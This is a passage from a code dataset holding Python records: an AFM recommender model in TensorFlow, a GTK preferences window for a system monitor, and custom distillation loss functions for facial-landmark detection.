adds muttley \"\"\"\n    new_p = PERSON(first_name='Muttley', surname='Dog',\n                   age=71, pet='Dick Dastardly', hobbies='Laughing')\n    key = new_p.first_name + '_' + new_p.surname\n    people[key] = new_p\n\nif __name__ == '__main__':\n    main()\n","sub_path":"people.py","file_name":"people.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619369103","text":"import tensorflow as tf\n\n\n\"\"\"\nvec_dim : dimension of the embedding vectors.\nfield_lens : a list in which each element is the number of values the corresponding field can take. For example, gender has two values, so its element is 2.\nattention_factor : same meaning as in the paper.\nlr : learning rate.\nlamda : L2 regularization strength.\n\"\"\"\n\n\nclass AFM(object):\n    def __init__(self, vec_dim=None, field_lens=None, attention_factor=None, lr=None, dropout_rate=None, lamda=None):\n        self.vec_dim = vec_dim\n        self.field_lens = field_lens\n        self.field_num = len(field_lens)\n        self.attention_factor = attention_factor\n        self.lr = lr\n        self.dropout_rate = dropout_rate\n        self.lamda = float(lamda)\n\n        self.l2_reg = tf.contrib.layers.l2_regularizer(self.lamda)\n\n        self._build_graph()\n\n    def _build_graph(self):\n        self.add_input()\n        self.inference()\n\n    def add_input(self):\n        self.x = [tf.placeholder(tf.float32, name='input_x_%d'%i) for i in range(self.field_num)]\n        self.y = tf.placeholder(tf.float32, shape=[None], name='input_y')\n        self.is_train = tf.placeholder(tf.bool)\n\n    def inference(self):\n        with tf.variable_scope('linear_part'):\n            w0 = tf.get_variable(name='bias', shape=[1], dtype=tf.float32)\n            linear_w = [tf.get_variable(name='linear_w_%d'%i, shape=[self.field_lens[i]], dtype=tf.float32) for i in range(self.field_num)]\n            linear_part = w0 + tf.reduce_sum(\n                tf.concat([tf.reduce_sum(tf.multiply(self.x[i], linear_w[i]), axis=1, keep_dims=True) for i in range(self.field_num)], axis=1),\n                axis=1, keep_dims=True) # (batch, 1)\n        with tf.variable_scope('emb_part'):\n            emb = [tf.get_variable(name='emb_%d'%i, shape=[self.field_lens[i], self.vec_dim], dtype=tf.float32) for i in range(self.field_num)]\n            emb_layer = tf.stack([tf.matmul(self.x[i], emb[i]) for i in range(self.field_num)], axis=1) # (batch, F, K)\n\n        with tf.variable_scope('pair_wise_interaction_part'):\n            pi_embedding = []\n            for i 
in range(self.field_num):\n                for j in range(i+1, self.field_num):\n                    pi_embedding.append(tf.multiply(emb_layer[:,i,:], emb_layer[:,j,:])) # [(batch, K), ....]\n            pi_embedding = tf.stack(pi_embedding, axis=1) # (batch, F*(F-1)/2, K)\n            cross_num = self.field_num * (self.field_num - 1) // 2 # integer, so it can be used as a reshape dimension\n\n        with tf.variable_scope('attention_network'):\n            # (K, t)\n            att_w = tf.get_variable(name='attention_w', shape=[self.vec_dim, self.attention_factor], dtype=tf.float32, regularizer=self.l2_reg) # reg weight\n            att_b = tf.get_variable(name='attention_b', shape=[self.attention_factor], dtype=tf.float32)\n            att_h = tf.get_variable(name='attention_h', shape=[self.attention_factor, 1], dtype=tf.float32) # (t, 1)\n            # wx+b\n            attention = tf.matmul(tf.reshape(pi_embedding, shape=(-1, self.vec_dim)), att_w) + att_b # (batch*F*(F-1)/2, t)\n            # relu(wx+b)\n            attention = tf.nn.relu(attention)\n            # h^T(relu(wx+b))\n            attention = tf.reshape(tf.matmul(attention, att_h), shape=(-1, cross_num)) # (batch, F*(F-1)/2)\n            # softmax\n            attention_score = tf.nn.softmax(attention) # (batch, F*(F-1)/2)\n            attention_score = tf.reshape(attention_score, shape=(-1, cross_num, 1)) # (batch, F*(F-1)/2, 1)\n\n        with tf.variable_scope('prediction_score'):\n            weight_sum = tf.multiply(pi_embedding, attention_score) # (batch, F*(F-1)/2, K)\n            weight_sum = tf.reduce_sum(weight_sum, axis=1) # (batch, K)\n            weight_sum = tf.layers.dropout(weight_sum, rate=self.dropout_rate, training=self.is_train)\n            p = tf.get_variable(name='p', shape=[self.vec_dim, 1], dtype=tf.float32)\n            pred_score = tf.matmul(weight_sum, p) # (batch, 1)\n\n        self.y_logits = linear_part + pred_score\n        self.y_hat = tf.nn.sigmoid(self.y_logits)\n        self.pred_label = tf.cast(self.y_hat > 0.5, tf.int32)\n        self.loss = -tf.reduce_mean(self.y*tf.log(self.y_hat+1e-8) + (1-self.y)*tf.log(1-self.y_hat+1e-8))\n        reg_variables = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n        if len(reg_variables) > 0:\n            self.loss += tf.add_n(reg_variables)\n        self.train_op = tf.train.AdamOptimizer(self.lr).minimize(self.loss)\n\n","sub_path":"AFM/AFM1/AFM1.py","file_name":"AFM1.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212374069","text":"#gi.repository# GObject, Gtk, AppIndicator\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('Pango', '1.0')\nfrom gi.repository import Gtk as gtk\nfrom gi.repository import Pango as pango\n\n#My modules\nfrom modules import stats as stats\nfrom modules import io as io\n\ncpuswitch = gtk.Switch()\nramswitch = gtk.Switch()\nttuSpinButton = gtk.SpinButton()\n\ndef run():\n    window = ConfigWindow()\n    window.show_all()\n    gtk.main()\n\ndef label(self, text, size):\n    hbox = gtk.VBox(True, 1)\n\n    label = gtk.Label()\n\n    font = pango.FontDescription(\"/Montserrat.ttf \" + str(size))\n    label.modify_font(font)\n    label.set_markup(text)\n\n    hbox.set_homogeneous(True)\n    hbox.pack_start(label, True, True, 0)\n\n    return hbox\n\ndef checkBox(self, text):\n    hbox = gtk.HBox(True, 5)\n\n    label = gtk.Label(text)\n\n    cbtn = gtk.Switch()\n\n\n    if text == \"CPU\": # compare the text, not the gtk.Label object (a Label never equals a str)\n        cbtn.set_active(stats.cpuBool)\n        #cbtn.set_state(stats.cpuBool)\n\n    elif text == \"RAM\":\n        cbtn.set_active(stats.ramBool)\n        #cbtn.set_state(stats.ramBool)\n    elif text == \"DISK\":\n        cbtn.set_active(stats.diskBool)\n        #cbtn.set_state(stats.diskBool)\n\n    #hbox.set_homogeneous(True)\n    hbox.pack_start(label, False, False, 0)\n    hbox.pack_start(cbtn, True, False, 0)\n\n    #fix = gtk.Fixed()\n    #fix.put(hbox, 0, 0)\n\n    return 
hbox\n\nclass ConfigWindow(gtk.Window):\n def create(self):\n self.connect(\"destroy\", gtk.main_quit)\n self.set_icon_from_file(\"resources/imgs/favicon.png\")\n self.set_title(\"User Preferences\")\n self.set_resizable(False)\n self.set_default_size(256, 128)\n self.set_border_width(10)\n\n print(\"\\033[34mloading...\\033[0m\")\n print(io.load(stats.cpu))\n print(io.load(stats.ram))\n print(io.load(stats.ttu))\n\n cpuswitch.set_active(io.load(stats.cpu))\n ramswitch.set_active(io.load(stats.ram))\n ttuSpinButton.set_value(float(io.load(stats.ttu)))\n\n def saveBottomButtons(self):\n hbox = gtk.HBox(True, 5)\n\n saveButton = gtk.Button(\"Save\")\n saveButton.connect(\"clicked\", self.onSaveChanges)\n cancelButton = gtk.Button(\"Exit\")\n cancelButton.connect(\"clicked\", gtk.main_quit)\n\n hbox.pack_start(saveButton, False, False, 0)\n hbox.pack_start(cancelButton, False, False, 0)\n\n return hbox\n\n def onSaveChanges(self, button):\n stats.cpuBool = cpuswitch.get_active()\n stats.ramBool = ramswitch.get_active()\n stats.ttuValue = ttuSpinButton.get_value()\n print(\"Saving..\")\n io.save(self)\n print(\"\\033[32m Saved \\033[0m\")\n print(\"CPU : \" + str(stats.cpuBool))\n print(\"RAM : \" + str(stats.ramBool))\n print(\"TTU : \" + str(stats.ttuValue))\n\n def onSwitchCpu(self, switch, bool):\n if(switch.get_active() == True):\n stats.cpuBool = False\n else:\n stats.cpuBool = True\n cpuswitch.set_active(switch.get_active())\n\n def onSwitchRam(self, switch, bool):\n if(switch.get_active() == True):\n stats.ramBool = False\n else:\n stats.ramBool = True\n ramswitch.set_active(switch.get_active())\n\n def onSwitchTtu (self, SpinButton):\n stats.ttuValue = SpinButton.get_value()\n print(stats.ttuValue)\n\n def __init__(self):\n super(ConfigWindow, self).__init__()\n self.init_ui()\n\n def init_ui(self):\n self.create()\n #mainBox\n mainBox = gtk.Box()\n\n #VBox\n vbox = gtk.VBox(spacing = 7)\n\n\n \"\"\"TITLES\"\"\"\n title = label(self,\"User Preferences\", 20)\n subtitle = label(self,\"Show in top bar:\", 13)\n\n \"\"\"CPU SWITCH\"\"\"\n cpuBox = gtk.HBox(spacing = 3)\n cpuLabel = label(self, \"CPU\", 15)\n cpuSwitch = gtk.Switch()\n cpuSwitch.set_active(io.load(stats.cpu))\n cpuSwitch.connect(\"notify::active\", self.onSwitchCpu)\n cpuBox.pack_start(cpuLabel, True, False, 0)\n cpuBox.pack_start(cpuSwitch, True, False, 0)\n\n \"\"\"RAM SWITCH\"\"\"\n ramBox = gtk.HBox(spacing = 3)\n ramLabel = label(self, \"RAM\", 15)\n ramSwitch = gtk.Switch()\n ramSwitch.set_active(io.load(stats.ram))\n ramSwitch.connect(\"notify::active\", self.onSwitchRam)\n ramBox.pack_start(ramLabel, True, False, 0)\n ramBox.pack_start(ramSwitch, True, False, 0)\n\n \"\"\"TTU SPIN BUTTON\"\"\"\n ttuBox = gtk.HBox(spacing = 3)\n ttuLabel = label(self, \"Time to Update\", 10)\n ttuSpinButton = gtk.SpinButton()\n\n ttuSpinButton.set_digits(2)\n ttuSpinButton.set_range(0, 5)\n ttuSpinButton.set_increments(0.25, 0.25)\n ttuSpinButton.set_value(float(io.load(stats.ttu)))\n\n ttuSpinButton.connect(\"value-changed\", self.onSwitchTtu)\n ttuBox.pack_start(ttuLabel, True, False, 0)\n ttuBox.pack_start(ttuSpinButton, True, False, 0)\n\n\n bottomButtons = self.saveBottomButtons()\n\n #vbox.add(title)\n #vbox.add(subtitle)\n vbox.add(cpuBox)\n vbox.add(ramBox)\n vbox.add(ttuBox)\n\n align = gtk.Alignment(xalign = 1.0, yalign = 1.0, xscale = 0, yscale = 0.3)\n align.add(bottomButtons)\n\n vbox.add(align)\n\n #packagerObject\n box = gtk.Box(spacing=1)\n #fix = gtk.Fixed()\n\n #fix.put(box, 0, 0)\n self.add(box)\n 
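# pack the assembled settings column (switch rows, TTU spinner, save/exit buttons) centred inside the window\n        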
box.pack_start(vbox, True, False, 0)\n","sub_path":"modules/user_preferences.py","file_name":"user_preferences.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"201877032","text":"import math\n\nimport numpy as np\nimport tensorflow as tf\n\n# tf.compat.v1.disable_eager_execution()\n# tf.compat.v1.enable_eager_execution()\n\nfrom PIL import Image\nfrom tensorflow.keras import backend as K\nfrom scipy.spatial import distance\n\nfrom cnn_model import CNNModel\nfrom configuration import DatasetName, IbugConf, LearningConfig\nfrom image_utility import ImageUtility\nfrom pca_utility import PCAUtility\nfrom tf_record_utility import TFRecordUtility\n\nprint(tf.__version__)\n\n\nclass Custom_losses:\n def custom_face_web_loss(self, bath_size, ds_name, num_points, loss_type, main_loss_wight,\n inter_faceweb_weight, intra_faceweb_weight):\n def loss(y_true, y_pred):\n \"\"\"\"\"\"\n '''calculate the main loss'''\n if loss_type == 0:\n '''MAE'''\n main_loss = tf.reduce_mean(tf.abs(y_true - y_pred))\n elif loss_type == 1:\n '''MSE'''\n main_loss = tf.reduce_mean(tf.square(y_true - y_pred))\n '''calculate the inter faceweb distance: the distance between each facial elements(nose to mouth)'''\n inter_fb_gt = self._create_inter_fwd(ds_name, y_true, bath_size)\n inter_fb_pr = self._create_inter_fwd(ds_name, y_pred, bath_size)\n '''calculate the intra faceweb distance: the internal distance between a facial element(eye)'''\n\n return loss\n\n # def kd_loss(self, y_pr, y_gt, y_togh_t, y_tol_t, l_w_stu_t, l_w_togh_t, l_w_tol_t, loss_type=0):\n # \"\"\"\"\"\"\n # '''calculate the sign of difference'''\n # sign_delta_gt_and_tough_teacher = tf.sign((y_gt - y_togh_t))\n # sign_delta_gt_and_tol_teacher = tf.sign((y_gt - y_tol_t))\n # '''create weight_map'''\n # weight_map_t_tough = tf.math.multiply(tf.ones_like(y_gt), l_w_togh_t)\n # weight_map_t_tol = tf.math.multiply(tf.ones_like(y_gt), l_w_tol_t)\n #\n # '''find indices that need to be modified'''\n # minus_one_tough = tf.constant(l_w_togh_t, dtype=tf.float32)\n # minus_one_tol = tf.constant(l_w_tol_t, dtype=tf.float32)\n # where_cond_tough = tf.not_equal(sign_delta_gt_and_tough_teacher, minus_one_tough)\n # where_cond_tol = tf.not_equal(sign_delta_gt_and_tol_teacher, minus_one_tol)\n #\n # '''calculate the opposite sign items and fill map'''\n # indices_tough = tf.where(where_cond_tough)\n # indices_tol = tf.where(where_cond_tol)\n # weight_map_t_tough = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_gt, y_pr=y_pr,\n # y_t=y_togh_t,\n # loss_weight=l_w_togh_t,\n # loss_map=weight_map_t_tough)\n # weight_map_t_tol = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_gt, y_pr=y_pr,\n # y_t=y_tol_t,\n # loss_weight=l_w_tol_t,\n # loss_map=weight_map_t_tol)\n # '''apply map to the teacher weights'''\n # y_togh_t = tf.math.multiply(weight_map_t_tough, y_togh_t)\n # y_tol_t = tf.math.multiply(weight_map_t_tol, y_tol_t)\n #\n # return loss\n\n def kd_loss(self, x_pr, x_gt, x_tough, x_tol,\n alpha_tough, alpha_mi_tough,\n alpha_tol, alpha_mi_tol,\n main_loss_weight, tough_loss_weight, tol_loss_weight,\n num_of_landmarks):\n\n # loss_main = tf.reduce_mean(tf.sqrt(tf.abs(x_gt - x_pr)))\n # loss_main = tf.reduce_mean(tf.square(x_gt - x_pr))\n loss_main = tf.reduce_mean(tf.abs(x_gt - x_pr))\n return loss_main, 0, 0, 0\n\n\n \"\"\"\"\"\"\n '''creating np version of input tensors'''\n loss_shape = (x_pr.shape[0], x_pr.shape[1])\n # np_x_pr = 
x_pr.numpy().reshape(x_pr.shape[0] * x_pr.shape[1])\n np_x_pr = tf.reshape(tensor=x_pr, shape=x_pr.shape[0] * x_pr.shape[1])\n np_x_gt = tf.reshape(tensor=x_gt, shape=x_gt.shape[0] * x_gt.shape[1])\n np_x_tough = tf.reshape(tensor=x_tough, shape=x_tough.shape[0] * x_tough.shape[1])\n np_x_tol = tf.reshape(tensor=x_tol, shape=x_tol.shape[0] * x_tol.shape[1])\n # np_x_pr = K.eval(x_pr).reshape(x_pr.shape[0] * x_pr.shape[1])\n # np_x_gt = K.eval(x_gt).reshape(x_gt.shape[0] * x_gt.shape[1])\n # np_x_tough = K.eval(x_tough).reshape(x_tough.shape[0] * x_tough.shape[1])\n # np_x_tol = K.eval(x_tol).reshape(x_tol.shape[0] * x_tol.shape[1])\n\n '''calculate the weight map'''\n\n # weight_map_tough = [self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tough[i],\n # alpha=alpha_tough, alpha_mi=alpha_mi_tough)\n # for i in range(np_x_pr.shape[0])]\n # weight_map_tol = [self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tol[i],\n # alpha=alpha_tol, alpha_mi=alpha_mi_tol)\n # for i in range(np_x_pr.shape[0])]\n\n weight_map_tough = np.zeros_like(np_x_tough)\n weight_map_tol = np.zeros_like(np_x_tol)\n for i in range(np_x_pr.shape[0]):\n weight_map_tough[i] = self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tough[i],\n alpha=alpha_tough, alpha_mi=alpha_mi_tough)\n weight_map_tol[i] = self.calc_teacher_weight_loss(x_pr=np_x_pr[i], x_gt=np_x_gt[i], x_t=np_x_tol[i],\n alpha=alpha_tol, alpha_mi=alpha_mi_tol)\n '''reshape loss'''\n weight_map_tough = weight_map_tough.reshape(loss_shape)\n weight_map_tol = weight_map_tol.reshape(loss_shape)\n\n # weight_map_tough = np.array(weight_map_tough).reshape(loss_shape)\n # weight_map_tol = np.array(weight_map_tol).reshape(loss_shape)\n\n loss_tough = tf.reduce_mean(weight_map_tough * tf.abs(x_tough - x_pr))\n loss_tol = tf.reduce_mean(weight_map_tol * tf.abs(x_tol - x_pr))\n '''calculate the losses'''\n\n loss_main = main_loss_weight * tf.reduce_mean(tf.abs(x_gt - x_pr))\n loss_tough = tough_loss_weight * loss_tough\n loss_tol = tol_loss_weight * loss_tol\n loss_total = loss_main + loss_tough + loss_tol\n '''returns all losses'''\n return loss_total, loss_main, loss_tough, loss_tol\n\n def calc_teacher_weight_loss(self, x_pr, x_gt, x_t, alpha, alpha_mi):\n weight_loss_t = 0\n '''calculate betas'''\n beta = x_gt + 0.4 * abs(x_gt - x_t)\n beta_mi = x_gt - 0.4 * abs(x_gt - x_t)\n if x_t > x_gt:\n if x_pr >= x_t:\n weight_loss_t = alpha\n elif beta <= x_pr < x_t:\n weight_loss_t = alpha_mi\n elif x_gt <= x_pr < beta:\n weight_loss_t = (alpha_mi / (beta - x_gt)) * (x_pr - x_gt)\n elif beta_mi < x_pr < x_gt:\n weight_loss_t = (alpha / (beta_mi - x_gt)) * (x_pr - x_gt)\n elif x_pr <= beta_mi:\n weight_loss_t = alpha\n elif x_t < x_gt:\n if x_pr <= x_t:\n weight_loss_t = alpha\n elif x_t < x_pr <= beta_mi:\n weight_loss_t = alpha_mi\n elif beta_mi < x_pr <= x_gt:\n weight_loss_t = (-alpha_mi / (x_gt - beta_mi)) * (x_pr - x_gt)\n elif x_gt < x_pr <= beta:\n weight_loss_t = (alpha / (beta - x_gt)) * (x_pr - x_gt)\n elif x_pr > beta:\n weight_loss_t = alpha\n return weight_loss_t\n\n def custom_teacher_student_loss(self, lnd_img_map, img_path, teacher_models, teachers_weight_loss, bath_size,\n num_points, ds_name, loss_type):\n def loss(y_true, y_pred):\n image_utility = ImageUtility()\n\n t0_model = teacher_models[0]\n t1_model = teacher_models[1]\n l0_weight = teachers_weight_loss[0]\n l1_weight = teachers_weight_loss[1]\n\n y_true_n = tf.reshape(y_true, [bath_size, num_points], name=None)\n imgs_address = 
self.get_y(y_true_n, lnd_img_map, img_path)\n imgs_batch = [np.array(Image.open(img_file)) / 255.0 for img_file in imgs_address]\n\n y_pred_T0 = np.array([t0_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n y_pred_T1 = np.array([t1_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n\n '''test teacher Nets'''\n # counter = 0\n # for pre_points in y_pred_T1:\n # labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n # image_utility.create_landmarks_from_normalized(pre_points, 224, 224, 112, 112)\n # imgpr.print_image_arr((counter + 1) * 1000, imgs_batch[counter], landmark_arr_x_p, landmark_arr_y_p)\n # counter += 1\n\n y_pred_Tough_ten = K.variable(y_pred_T0)\n y_pred_Tol_ten = K.variable(y_pred_T1)\n\n '''calculate the sign of difference'''\n sign_delta_gt_and_tough_teacher = tf.sign((y_true - y_pred_Tough_ten))\n sign_delta_gt_and_tol_teacher = tf.sign((y_true - y_pred_Tol_ten))\n '''for each point, if signs are the same, we sum losses, \n but if signs are different, we minus the \n teacher loses from the main loss, IF:\n asb(y_pred - y_pred_tech_i)) < '''\n\n '''assign weight loss'''\n tough_teacher_weight_loss = 1\n tol_teacher_weight_loss = 1\n\n '''create weight_map'''\n weight_map_t_tough = tf.math.multiply(tf.ones_like(y_true), tough_teacher_weight_loss)\n weight_map_t_tol = tf.math.multiply(tf.ones_like(y_true), tol_teacher_weight_loss)\n\n '''find indices that need to be modified'''\n minus_one_tough = tf.constant(tough_teacher_weight_loss, dtype=tf.float32)\n minus_one_tol = tf.constant(tough_teacher_weight_loss, dtype=tf.float32)\n where_cond_tough = tf.not_equal(sign_delta_gt_and_tough_teacher, minus_one_tough)\n where_cond_tol = tf.not_equal(sign_delta_gt_and_tol_teacher, minus_one_tol)\n\n '''calculate the opposite sign items and fill map'''\n indices_tough = tf.where(where_cond_tough)\n indices_tol = tf.where(where_cond_tol)\n\n weight_map_t_tough = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_true, y_pr=y_pred,\n y_t=y_pred_Tough_ten,\n loss_weight=tough_teacher_weight_loss,\n loss_map=weight_map_t_tough)\n weight_map_t_tol = self._fill_opposite_sign_map(indices=indices_tough, y_gt=y_true, y_pr=y_pred,\n y_t=y_pred_Tol_ten,\n loss_weight=tol_teacher_weight_loss,\n loss_map=weight_map_t_tol)\n '''apply map to the teacher weights'''\n y_pred_Tough_ten = tf.math.multiply(weight_map_t_tough, y_pred_Tough_ten)\n y_pred_Tol_ten = tf.math.multiply(weight_map_t_tol, y_pred_Tol_ten)\n ''''''\n if loss_type == 0:\n '''MAE'''\n mse_te0 = tf.reduce_mean(tf.abs(y_pred - y_pred_Tough_ten))\n mse_te1 = tf.reduce_mean(tf.abs(y_pred - y_pred_Tol_ten))\n mse_main = tf.reduce_mean(tf.abs(y_pred - y_true))\n elif loss_type == 1:\n '''MSE'''\n mse_te0 = tf.reduce_mean(tf.square(y_pred - y_pred_Tough_ten))\n mse_te1 = tf.reduce_mean(tf.square(y_pred - y_pred_Tol_ten))\n mse_main = tf.reduce_mean(tf.square(y_pred - y_true))\n ''' or:'''\n # mse = tf.keras.losses.MeanSquaredError()\n # mse_te0 = mse(y_pred_T0_ten, y_true)\n ''' or:'''\n # mse_main = K.mean(K.square(y_pred - y_true))\n # mse_main = K.mean(K.square(y_pred - y_true))\n\n return 10 * mse_main + ((l0_weight * mse_te0) + (l1_weight * mse_te1))\n\n return loss\n\n def _fill_opposite_sign_map(self, indices, y_gt, y_pr, y_t, loss_weight, loss_map):\n for index in indices:\n loss_map[index] = loss_weight * y_pr[index] / abs(y_gt[index] - y_t[index])\n return loss_map\n\n def get_y(self, y_true_n, lnd_img_map, img_path):\n vec_mse = K.eval(y_true_n)\n 
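# vec_mse holds the ground-truth landmark batch as a NumPy array of shape (batch, num_points)\n        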
        print(vec_mse.shape)\n        imgs = []\n        for lnd in vec_mse:\n            print(lnd.shape)\n            # lnd = lnd.tostring()\n            # print(lnd)\n            # lnd_hash = self.get_hash_key(lnd)\n            lnd_hash = self.np_to_str(lnd)\n            print(\"-------------------\")\n            print(lnd_hash)\n            print(\"-------------------\")\n            key = lnd_hash\n            img_name = lnd_img_map[key]\n            imgs.append(img_path + img_name)\n        return np.array(imgs)\n\n    def np_to_str(self, input):\n        str_out = ''\n        for item in input:\n            str_out += str(item)[:3]\n        return str_out\n\n    def get_hash_key(self, input):\n        return str(hash(str(input).replace(\"\\n\", \"\").replace(\" \", \"\")))\n\n    def _decode_tf_file_name(self, file_name):\n        return str(file_name).replace(\"X\", \"\")\n\n    # def _create_inter_fwd(self, ds_name, y_pred, bath_size):\n    #     \"\"\"based on the database, we return the distance between each facial elements\"\"\"\n    #     if ds_name == DatasetName.cofw:\n    #     # elif ds_name == DatasetName.ibug:\n    #     # elif ds_name == DatasetName.wflw:\n\n    def asm_assisted_loss(self, hmp_85, hmp_90, hmp_95):\n        def loss(y_true, y_pred):\n            return K.mean(K.square(y_pred - y_true))\n\n        return loss\n\n    def _calculate_mse(self, y_p, y_t):\n        mse = (np.square(y_p - y_t)).mean(axis=None)\n        # print('y_p: '+str(y_p.shape))\n        # print('mse: '+str(mse.shape))\n        # loss = 0\n        # for j in range(len(y_p)):\n        #     loss += (y_p[j] - y_t[j]) ** 2\n        # loss /= len(y_p)\n\n        # print('calculate_mse: ' + str(mse))\n        return mse\n\n    def _generate_distance_matrix(self, xy_arr):\n        # numpy expects a tuple of slices here; the even slices pick x coordinates, the odd ones pick y\n        x_arr = xy_arr[tuple(slice(None, None, 2) for _ in range(xy_arr.ndim))]\n        y_arr = xy_arr[tuple(slice(1, None, 2) for _ in range(xy_arr.ndim))]\n\n        d_matrix = np.zeros(shape=[len(x_arr), len(y_arr)])\n        for i in range(0, x_arr.shape[0], 1):\n            for j in range(i + 1, x_arr.shape[0], 1):\n                p1 = [x_arr[i], y_arr[i]]\n                p2 = [x_arr[j], y_arr[j]]\n                d_matrix[i, j] = distance.euclidean(p1, p2)\n                d_matrix[j, i] = distance.euclidean(p1, p2)\n        return d_matrix\n\n    def _depart_facial_point(self, xy_arr):\n        face = xy_arr[0:54]  # landmark_face_len = 54\n        nose = xy_arr[54:72]  # landmark_nose_len = 18\n        leys = xy_arr[72:84]  # landmark_eys_len = 24\n        reys = xy_arr[84:96]  # landmark_eys_len = 24\n        mouth = xy_arr[96:136]  # landmark_mouth_len = 40\n        return face, nose, leys, reys, mouth\n\n    def custom_loss_hm(self, ten_hm_t, ten_hm_p):\n        # print(ten_hm_t.get_shape())  # [None, 56, 56, 68]\n        # print(ten_hm_p.get_shape())\n\n        tf_utility = TFRecordUtility()\n\n        sqr = K.square(ten_hm_t - ten_hm_p)  # [None, 56, 56, 68]\n        mean1 = K.mean(sqr, axis=1)\n        mean2 = K.mean(mean1, axis=1)\n        tensor_mean_square_error = K.mean(mean2, axis=1)\n\n        # print(tensor_mean_square_error.get_shape().as_list())  # [None, 68]\n\n        # vec_mse = K.eval(tensor_mean_square_error)\n        # print(\"mse.shape:\")\n        # print(vec_mse.shape)  # (50, 68)\n        # print(vec_mse)\n        # print(\"----------->>>\")\n\n        '''calculate points from generated hm'''\n\n        p_points_batch = tf.stack([tf_utility.from_heatmap_to_point_tensor(ten_hm_p[i], 5, 1)\n                                   for i in range(LearningConfig.batch_size)])\n\n        t_points_batch = tf.stack([tf_utility.from_heatmap_to_point_tensor(ten_hm_t[i], 5, 1)\n                                   for i in range(LearningConfig.batch_size)])\n\n        '''p_points_batch is [batch, 2, 68]'''\n        sqr_2 = K.square(t_points_batch - p_points_batch)  # [None, 2, 68]\n        mean_1 = K.mean(sqr_2, axis=1)\n        tensor_indices_mean_square_error = K.mean(mean_1, axis=1)\n\n        # tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_indices_mean_square_error])\n\n        tensor_total_loss = tf.add(tensor_mean_square_error, tensor_indices_mean_square_error)\n        return tensor_total_loss\n\n    def 
custom_loss_hm_distance(self, ten_hm_t, ten_hm_p):\n        print(ten_hm_t.get_shape().as_list())  # [None, 56, 56, 68]\n        print(ten_hm_p.get_shape())\n\n        tf_utility = TFRecordUtility()\n\n        sqr = K.square(ten_hm_t - ten_hm_p)  # [None, 56, 56, 68]\n        mean1 = K.mean(sqr, axis=1)\n        mean2 = K.mean(mean1, axis=1)\n        tensor_mean_square_error = K.mean(mean2, axis=1)\n        # print(tensor_mean_square_error.get_shape().as_list())  # [None, 68]\n\n        # vec_mse = K.eval(tensor_mean_square_error)\n        # print(\"mse.shape:\")\n        # print(vec_mse.shape)  # (50, 68)\n        # print(vec_mse)\n        # print(\"----------->>>\")\n\n        '''convert tensor to vector'''\n        vec_hm_p = K.eval(ten_hm_p)\n        vec_hm_t = K.eval(ten_hm_t)\n\n        loss_array = []\n\n        for i in range(LearningConfig.batch_size):\n            '''convert heatmap to points'''\n            x_h_p, y_h_p, xy_h_p = tf_utility.from_heatmap_to_point(vec_hm_p[i], 5, 1)\n            x_h_t, y_h_t, xy_h_t = tf_utility.from_heatmap_to_point(vec_hm_t[i], 5, 1)\n\n            '''normalise points to be in [0, 1]'''\n            x_h_p = x_h_p / 56\n            y_h_p = y_h_p / 56\n            xy_h_p = xy_h_p / 56\n            x_h_t = x_h_t / 56\n            y_h_t = y_h_t / 56\n            xy_h_t = xy_h_t / 56\n            '''test print images'''\n            # imgpr.print_image_arr(i + 1, np.zeros(shape=[56, 56]), x_h_t, y_h_t)\n            # imgpr.print_image_arr((i + 1)*1000, np.zeros(shape=[56, 56]), x_h_p, y_h_p)\n\n            # print('--xy_h_p:---')\n            # print(xy_h_p)\n            # print('--xy_h_t:---')\n            # print(xy_h_t)\n\n            # unpack in the order _depart_facial_point returns: face, nose, left eye, right eye, mouth\n            face_p, nose_p, leye_p, reye_p, mouth_p = self._depart_facial_point(xy_h_p)\n            face_t, nose_t, leye_t, reye_t, mouth_t = self._depart_facial_point(xy_h_t)\n\n            '''generate facial distance matrix'''\n            face_p_mat, face_t_mat = self._generate_distance_matrix(face_p), self._generate_distance_matrix(face_t)\n            mouth_p_mat, mouth_t_mat = self._generate_distance_matrix(mouth_p), self._generate_distance_matrix(mouth_t)\n            nose_p_mat, nose_t_mat = self._generate_distance_matrix(nose_p), self._generate_distance_matrix(nose_t)\n            leye_p_mat, leye_t_mat = self._generate_distance_matrix(leye_p), self._generate_distance_matrix(leye_t)\n            reye_p_mat, reye_t_mat = self._generate_distance_matrix(reye_p), self._generate_distance_matrix(reye_t)\n\n            '''calculate loss from each pair matrices'''\n\n            face_loss = LearningConfig.reg_term_face * self._calculate_mse(face_p_mat, face_t_mat) / len(face_p)\n            mouth_loss = LearningConfig.reg_term_mouth * self._calculate_mse(mouth_p_mat, mouth_t_mat) / len(mouth_p)\n            nose_loss = LearningConfig.reg_term_nose * self._calculate_mse(nose_p_mat, nose_t_mat) / len(nose_p)\n            leye_loss = LearningConfig.reg_term_leye * self._calculate_mse(leye_p_mat, leye_t_mat) / len(leye_p)\n            reye_loss = LearningConfig.reg_term_reye * self._calculate_mse(reye_p_mat, reye_t_mat) / len(reye_p)\n\n            loss_array.append(face_loss + mouth_loss + nose_loss + leye_loss + reye_loss)\n\n            # print('mse[i]: ' + str(vec_mse[i]))\n            # print('face_loss[i]: ' + str(face_loss))\n            # print('mouth_loss[i]: ' + str(mouth_loss))\n            # print('nose_loss[i]: ' + str(nose_loss))\n            # print('leye_loss[i]: ' + str(leye_loss))\n            # print('reye_loss[i]: ' + str(reye_loss))\n            # 